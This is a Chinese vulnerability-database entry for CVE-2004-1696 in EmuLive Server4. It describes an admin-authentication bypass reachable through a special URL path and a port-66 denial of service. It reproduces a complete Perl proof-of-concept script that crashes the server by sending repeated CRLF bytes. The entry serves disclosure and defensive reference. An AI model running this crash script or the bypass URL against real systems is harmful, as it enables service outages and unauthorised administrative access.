EmuLive Server4多个安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108187 漏洞类型 未知
发布时间 2004-09-21 更新时间 2006-05-01
CVE编号 CVE-2004-1696 CNNVD-ID CNNVD-200409-054
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/471
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200409-054
|漏洞详情
EmuLiveServer4是一款实时媒体广播软件。结合其他Emulive产品和建立类似数字电视的软件。EmuLiveServer4实现存在多个安全问题,远程攻击者可以利用这些漏洞对系统进行未授权访问及进行拒绝服务攻击。未授权管理访问问题:EmuLiveServer4包含远程管理接口,提交如下特殊的URL,可以绕过验证以管理员权限访问应用系统:http://localhost//PUBLIC/ADMIN/INDEX.HTM拒绝服务攻击问题:EmuLiveServer4在处理远程用户对66端口访问处理存在问题,攻击者连接此端口,快速输入8个以上的回车符,可导致应用程序崩溃。
|漏洞EXP
#!/usr/bin/perl
##############################################
# EmuLive Server4 Commerce Edition Build 7560 
##############################################
# Remote crash proof of conecpt code. When the 
# machine running Server4 recieves a malformed
# request on TCP port 66 it crashes very hard!
##############################################
# GulfTech Security   http://www.gulftech.org
##############################################

use IO::Socket;

unless ($ARGV[0]) 
{ 
	die "usage: s4nomore.pl host port"
}

	printf("==========================================================\n",);
	printf(" EmuLive Server4 Commerce Edition Build 7560 Remote Crash \n",);
	printf("==========================================================\n",);


	my $host = $ARGV[0];
	my $port = $ARGV[1];


	my $dead = "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
			   "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
			   "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
			   "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A"; #\r\n\r\n\r\n\r\n


	my $i = IO::Socket::INET->new( Proto => "tcp",
							       PeerAddr  => $host,
								   PeerPort  => $port,
							       Timeout   => '100',
							       Type      => SOCK_STREAM,
							      ) || die("Connect Error");

		printf("[*] Sending Death Packet To %s\n", $host);
		print $i $dead;	
		$i->autoflush(1);
		printf("[*] Host %s Should Now Be Dead\n", $host);
		printf("[*] Closing Connections And Exiting  \n");
		close $i;
		exit;

# milw0rm.com [2004-09-21]
|参考资料

来源:SECUNIA
名称:12616
链接:http://secunia.com/advisories/12616
来源:XF
名称:emulive-tcp-port-dos(17451)
链接:http://xforce.iss.net/xforce/xfdb/17451
来源:BID
名称:11226
链接:http://www.securityfocus.com/bid/11226
来源:www.gulftech.org
链接:http://www.gulftech.org/?node=research&article_id=00051-09202004
来源:BUGTRAQ
名称:20040921MultipleVulnerabilitiesInEmuLiveServer4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109577497718374&w=2